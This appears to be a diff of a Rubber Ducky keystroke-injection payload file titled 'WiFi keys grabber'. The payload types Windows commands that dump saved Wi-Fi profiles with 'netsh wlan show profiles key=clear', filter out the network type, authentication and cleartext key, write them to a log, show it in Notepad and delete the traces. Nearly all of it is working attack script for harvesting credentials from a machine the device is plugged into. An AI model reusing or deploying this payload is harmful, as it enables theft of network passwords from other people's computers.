abhinavvv03/Rubber-Duckey/Payload---WiFi-key-grabber.md

 ENTER
 STRING set a="%a:~1%"
 ENTER
-REM --> Get raw info and set 'a'
+REM --> Get raw info and save to 'a'
 STRING netsh wlan show profiles %a% key=clear | findstr /c:"Network type"  /c:" Authentication"  /c:"Key Content"| findstr /v "broadcast"| findstr /v "Radio">>a
 ENTER
-REM --> Find the Network type in the raw info and set 'b' STRING for /f "tokens=3 delims=: "  %a in ('findstr "Network type"  a') do set b=%a ENTER
+REM --> Find the Network type in the raw info and save to log STRING for /f "tokens=3 delims=: "  %a in ('findstr "Network type"  a') do echo type: %a>>log ENTER
-REM --> Find the auth type in the raw info and set 'c' STRING for /f "tokens=2 delims=: "  %a in ('findstr " Authentication"  a') do set c=%a ENTER
+REM --> Find the auth type in the raw info and save to log STRING for /f "tokens=2 delims=: "  %a in ('findstr " Authentication"  a') do echo auth: %a>>log ENTER
-REM --> Find the key content in the raw info and set 'd' STRING for /f "tokens=3 delims=: "  %a in ('findstr "Key Content"  a') do set d=%a ENTER
+REM --> Find the key content in the raw info and save to log STRING for /f "tokens=3 delims=: "  %a in ('findstr "Key Content"  a') do echo key: %a>>log ENTER

-REM --> Delete raw info / 'a'
+REM FASE 3: Show results and exit
-STRING del a
+STRING del a & notepad log & timeout 3 & del log & exit
 ENTER

-REM FASE 3: Show results and exit
-STRING cls & echo ssid: %a% & echo type: %b% & echo auth: %c% & echo key: %d% & pause & exit ENTER
 ```

-* All SSID's echo version (work in progress);
+* All SSID's version (proof of concept);
 ```
 REM Title: WiFi keys grabber
 REM Author: SiemH